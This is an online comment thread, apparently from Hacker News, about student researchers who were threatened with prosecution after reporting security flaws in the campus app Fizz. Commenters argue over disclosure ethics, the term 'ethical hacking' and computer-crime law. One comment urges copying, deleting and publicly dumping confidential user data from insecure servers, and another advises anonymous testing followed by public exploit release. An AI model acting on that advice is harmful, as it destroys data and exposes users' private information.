The person sending the letter also doesn't have a prison nor the power to put anyone in it. It is a persuasive legal letter stating someone's opinion about what someone else could potentially do.
A more equal comparison might be "If you tease a gorilla they might seriously hurt you"
Perfectly legal, but unethical. The motives are clear, they want to threaten/bully someone into silence who has information that could hurt their business. I don't think lawyers that engage in this behavior should be allowed to practice law, that's all.
> And at the end of their threat they had a demand: don’t ever talk about your findings publicly. Essentially, if you agree to silence, we won’t pursue legal action.
Legally, can this cover talking to e.g. state prosecutors and the police as well? Because claiming to be "100% secure", knowing you are not secure, and your users have no protection against spying from you or any minimally competent hacker, is fraud at minimum, but closer to criminal wiretapping, since you're knowingly tricking your users into revealing their secrets on your service, thinking they are "100% secure".
That this ended "amicably" is frankly a miscarriage of justice - the Fizz team should be facing fraud charges.
They could not have been ignorant of storing non-anonymous, plain-text messages. Even if we don't count that as insecure, they can only appeal to ignorance/negligence up until the point the security researchers informed them of their vulnerabilities.
After that, that they continued their "100% secure" marketing on one side, while threatening researchers into silence on the other, is plainly malicious.
I don't think the demands of Fizz have much legal standing.
We care more about corporations than citizens in the US. Advertising in the US is full of false claims. We ignore this because we pretend like words have no meaning.
Interesting. My school has a very similar platform, SideChat, which I doubt is much different. Makes me wonder how much they know about me, as I was permanently banned last year for questioning the validity of "gender-affirming care."
Fantastic for calling Fizz out. "Fizz did not protect their users’ data. What happened next?"
This isn't a "someone hacked them". It's that Fizz failed to do what they promised.
I'm still curious to hear if the vulnerability has been tested to see if it's been resolved.
I think in a follow-up article by the Stanford Daily they said the app creators have gotten a few million in funding and lots of professional help, including to fix security issues. Although it still looks like user data is not fully anonymized internally like they had previously claimed.
I think I might be a bit of an outlier on this, but I struggle to see the value of imposing an embargo date in a security disclosure unless it's sent to a large institution that is used to a formal process like that. In most cases, if you're trying to communicate to someone that you've found a vulnerability under the pretense that you're doing it for the greater good, why begin by the relationship with a deadline before you "go public?" Wouldn't that be something you do later on if it appears that they're just blowing you off and won't do anything about it?
I don't think this applies to the reporter in this case, but it does seem like there's a bit of a trend in security research lately to capitalize on the publicity of finding a vulnerability for one's own personal branding. That feels a bit disingenuous. Not that the appropriate response would be to threaten someone with legal action.
It doesn't give them any wiggle room to lead you on, it doesn't give you any wiggle room to say 'unacceptable or I blow the whistle tomorrow', it removes your judgement of the situation from the disclosure entirely. It is the safest option for people who are great at finding things worth disclosing but not so great at situation-judging.
It's not about personal branding, it's about protecting the users of the app. Either the app fixes the vulnerability so the users are no longer in danger, or the users are made aware that they are in danger.
Security researchers have a duty to users and industry first, then to the specific companies they are disclosing to. Most companies, without time pressure, do absolutely nil to fix the issues they are made aware of.
It's completely fine to discuss or request a different disclosure date when communicating with researchers. The delay is their protection against inaction.
Do you disagree that Users might be entitled to know when a corporation is misusing their private, sensitive information? What is ethical does not begin and end with the corporations best interest, the users whose private information is being mishandled are the victims here, let us not lose perspective.
Users who have been falsely assured that their data is both totally anonymous and "100% secure."
On the other hand, assuming the app creators we in far over their heads when it comes to proper security, I have to wonder if they started off cordially and then freaked out a short while later because after trying, they realized there was no possible way for them to correct the issue in the given timeline. So in desperation they resorted to something drastic (and arguably unethical) to cover their asses.
> One Friday night, we decided to explore whether Fizz was really “100% secure” like they claimed. Well, dear reader, Fizz was not 100% secure. In fact, they hardly had any security protections at all.
It's practically a given that the actual security (or privacy) of a software is inversely proportional to its claimed security and how loud those claims are. Also, the companies that pay the least attention to security are always the ones who later, after the breach, say "We take security very seriously..."
There should be harsher penalties for lawyers like Hopkins & Carley for threatening security researchers and engaging in unprofessional conduct like this.
Anyone can make a threat. There's a bit of smarts needed to classify a "threat" as credible or not. Only really a law enforcement officer can credibly bring charges against you. Unfortunately, we live in a society where someone with more money than you can use the courts to harass you, so you even if you don't fear illegitimate felony charges, you can get pretty much get sued for any reason at any time, which brings with it consequences if you don't have a lawyer to deal with it. So I understand why someone might be scared in this situation, and luckily they were able to find someone to work with them, pro bono. I really wish the law had some pro-active mechanism for dealing with this type of legal bullying.
In my opinion, they went too far and exposed themselves by telling the company.
In all honesty, nothing good usually comes from that. If you wanted the truth to be exposed, they would have been better off exposing it anonymously to the company and/or public if needed.
It's one thing to happen upon a vulnerability in normal use and report it. It's a different beast to gain access to servers you don't own and start touching things.
The story has greatly reduced value without knowing who the individuals behind Fizz really are. So that we can avoid doing business with them. It would be different if Fizz was a product of a megacorporation.
“Keep calm” and “be responsible” and “speak to a lawyer” are things I class as common sense. The gold nugget I was looking for was the red flashing shipwreck bouy/marker over the names.
I realize it is quick to be against Fizz, but I thought ethical hacking required prior permission.
Am I to understand you can attempt to hack any computer to gain unauthorized access without prior approval? That doesn't seem legal at all.
Whether or not there was a vulnerability, was the action taken actually legal under current law? I don't see anything indicating for or against in the article. Just posturing that "ethical hacking" is good and saying you are secure when you aren't is bad. None of that seems relevant to the actual question of what the law says.
(a) There's no such thing as "ethical hacking" (that's an Orwellian term designed to imply that testing conducted in ways unfavorable to vendors is "unethical").
(b) You don't require permission to test software running on hardware you control (absent some contract that says otherwise).
(c) But you're right, in this case, the researchers presumably did need permission to conduct this kind of testing lawfully.
Weird stance. Sure, you may disagree on the limitations of scope of various ethical hacking programs (bug bounties and such) but they consistently highlight some very serious flaws in all kinds of hardware and software.
Going out of scope (hacking a company with no program in place) is always a gamble and you’re betting on the leniency of the target. Probably not worth it unless you like to live dangerously.
His point is that the way the term is used, to protect vendors, has nothing to do with ethics.
If a researcher found a serious vuln, the ethical thing may very well be to document it publicly without coordination with the vendor, especially if such coordination hurts users.
I disagree with (a). Activities can be deemed ethical or unethical, and those norms are presumably reflected in our laws (as unauthorized hacking is). When they're not constrained by law (as certain publication and experimentation practices aren't), then they are constrained by social convention.
This is one of those cases, like "Zero Trust Networking" where you can't derive the meaning of a term axiomatically from the individual words. There is "responsible" and "irresponsible" disclosure, too, but "responsible disclosure" is also a specific, Orwellian basket of vendor-friendly policies that have little to do with ethics or responsibility.
"Responsible" and "irresponsible" are slippier words in the disclosure context. In the civil legal context, "responsibility" implies blameworthiness and liability arising out of a duty of care and a breach of the duty. But in the vulnerability disclosure context, since there's no duty prescribed by law, it has come to mean "social" vs. "antisocial" - getting along vs. being at odds.
My point is that it doesn't matter how slippery the underlying words are, because you're not meant to piece together the meaning of the statement from those words --- or rather, you are, but deceptively, by attributing them to the policy preferences of the people who coined the term.
Logomachy aside: "ethical hacking" was a term invented by huge companies in the 1990s to co-opt security research, which was at the time largely driven by small independent firms. You didn't want to engage just anybody, the logic went, because lots of those people were secretly criminals. No, you wanted an "ethical hacker" (later: a certified ethical hacker), who you could trust not to commit crimes while working for you.
I guess what I'm trying to say is that there is, and can be, such a thing as "ethical hacking," but perhaps it's not coterminous what vendors and others might claim it to be. The meanings of words evolve over time, sometimes for the worse (cough "literally"), and sometimes for the better. Groups have also reclaimed derogatory words through concerted action.
It's a complicated human activity, so of course there are ethics to it. But I'd strongly recommend not using the words "ethical hacker" next to each other, because that term has more meaning than you probably intend.
"Ethical hacking" is from the same vein as "responsible disclosure". These are weasel words that are used to demean security researchers who don't kiss the vendors' ass.
As a security researcher, my ethical obligation is not to the vendors of the software. It's to the users.
Ethically speaking, I don't care if my research makes the vendor look bad, hurts their sales, makes their PR team sad, etc. I similarly don't care if my research makes the vendor look good.
Are the users better protected by my research? If yes, ethical. If not, unethical.
Terms like "ethical hacking" are used to stilt the conversation in the favor of vendors.
> the database was running in the cloud, not on any computer they controlled.
If it's running in the Cloud, but in your Cloud account, it's morally equivalent to running on Your Machine. I'm not sure how the law will interpret anything, but given a compelling counter-argument, I don't imagine lawyers will argue differently.
No, because there's no such thing as "ethical hacking"; that's a marketing term invented by vendors to constrain researchers. You'd call what you're talking about "pentesting" or "red teaming". How you'd know you had a clownish pentest vendor would be if they themselves called it "ethical hacking".
There is no precedent for consequence-free probing of others' defenses. Unauthorized "testing conducted in ways unfavorable to vendors" is generally considered a crime of trespass, because everybody has the right to exist unmolested. Whether or not they have their shit together, you aren't authorized to test your kids' school's evacuation procedure by randomly showing up with a toy gun and a vest rigged with hotdogs and wires.
The way this goes in the digital space, people expect to break into my "house," see if they can get into my safe, snoop around in my wife's/daughter's nightstands, steal some of their underwear as a CTF exercise, help themselves to my liquor on the way out, then send me an invoice for their time while also demanding the right (or threatening) to publish everything they found on their blog. Unsolicited "security research" is a shakedown desperate to legitimize itself. Unlawful search/"fruit of the poisoned tree" exists to keep the cops from doing this to you, but it's totally acceptable for self-appointed "researchers" to do to anybody else I guess.
"Ethical hacking" is notifying the owner/authorities there's a potential problem at an address, seeing if they want your help in investigating, and working with them in that capacity-- proceeding to investigate only with explicit direction. Even if their incompetence or negligence in response affects you personally, that's not a cue to break a window and run your own investigation while collecting leverage you can use to shame them into compliance. That shit is just espionage masquerading as concern trolling.
You're doing the same thing the other commenters are: you're trying to derive from first principles what "ethical hacking" means. That's why this marketing trick is so insidious: everybody does that, and attributes to the term whatever they think the right things are. But the term doesn't mean those right things: it means what the vendors meant, which is: co-opted researchers working in collusion with vendors to give dev teams the maximum conceivable amount of time to apply fixes (years, often) and never revealing the details of any flaws (also: that any security researcher that doesn't put the word "ethical" in their title is endorsing criminal hacking; also: that you should buy all your security services from I.B.M.).
You can say "that's not what I mean by ethical hacking", but that doesn't matter, because that's what the term of art itself does mean.
If you want to live in a little rhetorical bubble where terms of art mean what you think they should mean, that's fine. I think it's worth being aware that, to practitioners, that's not what the terms mean, and that people familiar with the field generally won't care about your idiosyncratic definitions.
As a point of comparison, we don't talk about "ethical plumbing" as a term. If a company hires a plumber to fix their bathroom, they're just a plumber. If somebody breaks the law to enter a place and mess with the pipes, they're just a trespasser.
But the companies that brand themselves as selling "ethical" penetration testing, and sell certifications for "ethical hacking" would very much like you to lump other companies and other security researchers who are operated legally into the same mental bucket as criminals by implicitly painting them as "unethical".
Ethically, they did the good thing by challenging the "100% secure" claim. Legally, they were hacking (without permission). Very high praise to the EFF for getting them out of trouble. Go donate.
Given the aggressive response from this company, it is less likely that it will become the target of any security researchers in the future (who wants the hassle ?). That by itself makes their app less secure in the long term. Also, who'd want to support founders with this "I will destroy you!, even though you helped me improve my system" mentality ? I wouldn't be surprised if this startup dies off from this info.
Kudos to Cooper, Miles and Aditya for seeing this through.
Alternatively, it will attract the attention of less-noble researchers who won't bother with responsible disclosure rules — they'll just leak data or tinker with the system. But I agree that well-intentioned security researchers will be less likely to look into this platform.
A private individual or company cannot file criminal/felony charges. Those are filed by a County Prosecutor, District Attorney, State Attorney, etc after being convinced of probable cause.
They could threaten to report you to the police or such authorities, but they would have to turn over their evidence to them and to you and open all their relevant records to you via discovery.
> Get a lawyer
Yes, if they're seriously threatening legal action they already have one.
Yes, threatening to report is what was really happening here. But in their effort to scare us, they elided much of that process. From our perspective it was "watch out, you might face felony charges if you don't agree to silence".
As the linked article notes, it's explicitly against the California State Bar Code of Conduct to condition criminal proceedings on requiring a civil outcome, so while not technically illegal it's censurable - that's against the attorneys who threatened, not the clients they represent.
What I'm pondering is how what happened in TFA is different from a situation like:
1. I (legally) gather evidence of a neighbor committing a criminal action; e.g. take a picture of them selling illicit drugs.
2. I threaten to send the evidence to the authorities unless they pay me money.
That seems like blackmail to me, which is illegal under both state and federal law. The only difference I can think of is the consideration. If the consideration must be property for it to count as blackmail, then what about this situation:
1. I'm engaged in a civil dispute with my neighbor
2. I gather evidence of them committing a criminal action
3. I threaten to reveal the evidence unless they settle in my favor
Does that magically become legal because no money exchanges hands?
> A private individual or company cannot file criminal/felony charges. Those are filed by a County Prosecutor, District Attorney, State Attorney, etc after being convinced of probable cause.
That's not true, depending on where you live in the US. Several states allow private citizens to file criminal charges with a magistrate. IIRC, NJ law allows actual private prosecution of criminal charges, subject to approval by a judge and prosecutor. I think that's a holdover from English common law.
Those classmates committed felony extortion with their threat, just as an aside.
That would've been a better legal threat to put on them as a offensive move, instead of using the EFF. "Sure you can attempt to have me jailed but your threat is clear-cut felony extortion. See you in the jail cell right there with me!"
> Stay calm. I can’t tell you how much I wanted to curse out the Fizz team over email. But no. We had to keep it professional — even as they resorted to legal scare tactics. Your goal when you get a legal threat is to stay out of trouble. To resolve the situation. That’s it. The temporary satisfaction of saying “fuck you” isn’t worth giving up the possibility of an amicable resolution.
Maybe it's because I'm getting old, but it would never cross my mind to take any of this personally.
If they're this bad at security, this bad at marketing, and then respond to a fairly standard vulnerability disclosure with legal threats it's pretty clear they have no idea what they're doing.
Being the "good guy" can sometimes be harder than being the "bad guy", but suppressing your emotions is a basic requirement for being either "guy".
Yup, that's it :) These kids are either in college or just graduated. They were smart enough to get themselves legal help before saying anything stupid, which is impressive. Cut them some slack!
My ego has probably by now rewritten my memories to match who I am today. This situation seems like it would have had me and my friends laughing, not scared. Brains are weird.
> If they're this bad at security, this bad at marketing, and then respond to a fairly standard vulnerability disclosure with legal threats it's pretty clear they have no idea what they're doing.
And yet, according to the linked article in the Stanford Daily, they received $4.5 million in funding
Do you think that someone less ethically minded could have resolved the issue more simply by redirecting their landing page to a warning that the site was insecure and shutting it down incurring near zero personal risk of retaliation and letting people make an informed choice about continuing to use the site.
This is wholly and obviously illegal but so is the described ethical hacking. You have adopted a complex nuanced strategy to minimize harm to all parties. This is great morally but as far as I can tell its only meaningful legally insofar as it makes folks less likely to go after you nothing about it makes your obviously illegal actions legal so if you are going to openly flout the law it makes sense to put less of a target on your back while you are breaking the law.
Best advice I can give someone is never do security research for a company without expressed written consent to do so and document everything as agreed to.
Payouts for finding bugs when there isn't an already established process are either not going to be worth your time or will be seen as malicious activity.
Unless you're looking to earn a bounty, always disclose testing of this type anonymously. Clean device, clean wi-fi, new accounts. That way if they threaten you instead of thanking you you can just drop the exploit details publicly and wash your hands of it.
This sounds a lot less interesting than the title makes it out to be. Is the fact that it is a "classmate" really relevant? Would the events have happened differently if it was another company with no connection to the school?
In short, if they are a company and are not 100% secure and they say they are then they are committing fraud. The person doing the testing is providing the evidence for a legal case and no amount of legal threats change that.
The article asserts "there are an increasing number of resources available to good-faith security researchers who face legal threats". Is there an example of such, outside of the EFF? How do beginners find them?
Makes me so happy to know EFF and ethical hackers like this exist. I know they can’t test every app and every situation, but that there are hobbyists like this is such a testimony to humanity.
This isn't the first time a security research who's politely and confidentially disclosed a vulnerability has been threaned. There's an important lesson to glean from this.
The next time someone discovers a company that has poor database security, they should, IMO: (1) make a full copy of confidential user data, (2) delete all data on the server, (3) publish confidential user data on some dumping site; and protect their anonymity while doing all 3 of these.
If these researchers had done (2) and (3) – and done so anonymously, that would have not only protected them from legal threats/harm, but also effectively killed off a company that shouldn't exist – since all of Buzz/Fizz users would likely abandon it as consequence.
> The next time someone discovers a company that has poor database security, they should, IMO: (1) make a full copy of confidential user data, (2) delete all data on the server, (3) publish confidential user data on some dumping site; and [4] protect their anonymity while doing all 3 of these.
Aaron Swartz only did (1). Failing at (4) didn't end so well for him.
I get that you're frustrated but encouraging others to make martyrs of themselves is cowardice. If some dumb kid tries this and their opsec isn't bulletproof, they're fucked. Put your own skin in the game and do it yourself if your convictions are that strong.
So your solution for possibly being prosecuted for something marginal is to do several things for which it would be much more reasonable to be prosecuted? That seems like a rather unwise solution to the problem.
It's especially unwise because you now give the company a massive incentive to hire real forensics specialists to try to track you down. You're placing a lot of faith in your ability to remain anonymous under that level of scrutiny.
Yeah, it’s unwise, but also a fair warning. If you threaten someone who has leverage over you, you might find your own problems escalated. Not everyone behaves perfectly rationally under pressure.
I'd suggest reading tptacek's comment: https://news.ycombinator.com/item?id=37298589 which does not 100% address your exact question, but gets close. As disclaimed, tptacek is not a lawyer, but has a lot of experience in this space and I'd still take it as a first pass answer.
Personally, I don't see it as worth it to pursue a company that does not hang out some sort of public permission to poke at them. The upside is minimal and the downside significant. Note this is a descriptive statement, not a normative statement. In a perfect world... well, in a perfect world there'd be no security vulnerabilities to find, but... in a perfect world sure you'd never get in trouble for poking through and immediately backing off, but in the real world this story just happens too often. Takes all the fun right out of it. YMMV.
> And then, one day, they sent us a threat. A crazy threat. I remember it vividly. I was just finishing a run when the email came in. And my heart rate went up after I stopped running. That’s not what’s supposed to happen. They said that we had violated state and federal law. They threatened us with civil and criminal charges. 20 years in prison. They really just threw everything they could at us. And at the end of their threat they had a demand: don’t ever talk about your findings publicly. Essentially, if you agree to silence, we won’t pursue legal action. We had five days to respond.
This during a time when thousands or millions have their personal data leaked every other week, over and over, because companies don't want to cut into their profits.
Researchers who do the right thing face legal threats of 20 years in prison. Companies who cut corners on security face no consequences. This seems backwards.
Remember when a journalist pressed F12 and saw that a Missouri state website was exposing all the personal data of every teacher in the state (including SSN, etc). He reported the security flaw responsibly and it was embarrassing to the State so the Governor attacked him and legally harassed him. https://arstechnica.com/tech-policy/2021/10/missouri-gov-cal...
I once saw something similar. A government website exposing the personal data of licensed medical professionals. A REST API responded with all their personal data (including SSN, address, etc), but the HTML frontend wouldn't display it. All the data was just an unauthenticated REST call away, for thousands of people in the state. What did I do? I just closed the tab and never touched the site again. It wasn't worth the personal risk to try to do the right thing so I just ignored it and for all I know all those people had their data stolen multiple times over because of this security flaw. I found the flaw as part of my job at the time, I don't remember the details anymore. It has probably been fixed by now. Our legal system made it a huge personal risk to do the right thing, so I didn't do the right thing.
Which brings me to my point. We need strong protections for those who expose security flaws in good faith. Even if someone is a grey hat and has done questionable things as part of their "research", as long as they report their security findings responsibly, they should be protected.
Why have we prioritized making things nice and convenient for the companies over all else? If every American's data gets stolen in a massive breach, it's so sad, but there's nothing we can do (shrug). If one curious user or security research pokes an app and finds a flaw, and they weren't authorized to do so, OMG!, that person needs to go to jail for decades, how dare they press F12!!!1
This is a national security issue. While we continue to see the same stories of massive breaches in the news over and over and over, and some of us get yet another free year of monitoring that credit agencies don't commit libel against us, just remember that we put the convenience of companies above all else. They get to opt-in to having their security tested, and over and over they fail us.
Protect security researchers, and make it legal to test the security of an app even if the owning company does not consent. </rant>
We need personal data protection laws in this country so that as an individual after a data breach at wherever I can personally sue them for damages. Potentially very significant damages if they leak a full dossier like a credit reporting agency.
If that happens the whole calculus of bug bounties changes immediately.
I understand there has been some progress on this front, but it's not nearly enough. We need stronger protections for whistleblowers and security researchers. Corporations and legislators wont write these laws for us because it's not particularly in their interest. Well, maybe senator Wyden and a few other highly ethical and tech savvy legislators well help, but the onus is on us as concerned citizens and perennial victims.
Perhaps before killing someone with a comment, you should provide examples to back up your vitriol? The guidelines were reposted a mere four days ago...
Yet another example of someone security "testing" someone else's servers/systems without permission. That's called hacking. Doesn't matter if you have "good faith" or not. It's not your property and you don't get to access it in ways the owners don't desire you to access it without being subject to potential civil and criminal enforcement against you.
Meanwhile companies leak the private data of millions of people and nothing happens.
If a curious kid does a port scan police will smash down doors. People will face decades in prison.
If a negligent company leaks the private data of every single American, well, gee, what could we have done more, we had that one company do an audit and they didn't find anything and, gee, we're just really sorry, so lets all move on and here's a free year of credit monitoring which you may choose to continue paying us for at the end of the free year.
Look at it from a consumer rights angle. A product is advertised as having some feature ("100% security" in this case), but nobody is allowed to test (even without causing any harm) if that is true.
It's effectively legalizing fraud for a big chunk of computer security. Sure fraud itself is technically still illegal, but so is exposing it.
As a user of the site who has been falsely assured that your data is "100% secure" and totally anonymous, is that data in fact not your property? Perhaps not in a strictly legal sense, but from an ethical standpoint it is certainly more of a grey area than corporations and their lawyers would want us to roll over and accept.
My understanding is that these security researchers only accessed their own accounts and data on the cloud servers, and in doing so they did not bypass any "effective technical protections on access."
Thankfully for all of us, the DoJ appears to disagree with your sentiment. At least with the current administration.
Is it your position is that when you are lied to, and your sensitive and personally identifying information is being grossly mishandled by a company, your only recourse is to spend thousands of dollars and incredible amounts of time on a court case that has very little chance of achieving anything?
No, let's bury our heads in the sand while being sure to handicap (and treat as hostile) the only group of people who seem to care and have the expertise to do something about this giant mess we are in with regards to consumer, patient, and citizen data security.
* Fizz appears to be a client/server application (presumably a web app?)
* The testing the researchers did was of software running on Fizz's servers
* After identifying a vulnerability, the researchers created administrator accounts using the database activity they obtained
* The researchers were not given permission to do this testing
If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
At least three things mitigate their legal risk:
1. It's very clear from their disclosure and behavior after disclosing that they were in good faith conducting security research, making them an unattractive target for prosecution.
2. It's not clear that they did any meaningful damage (this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplating retaining a forensics firm or truing things up with their insurers, who probably did not exist), meaning there wouldn't have been much to prosecute.
3. Fizz's lawyers fucked up and threatened a criminal prosecution in order to obtain a valuable concession fro the researchers, which, as EFF points out, violates a state bar rule.
I think the good guys prevailed here, but I'm wary of taking too many lessons from this; if this hadn't been "Fizz", but rather the social media features of Dunder Mifflin Infinity, the outcome might have been gnarlier.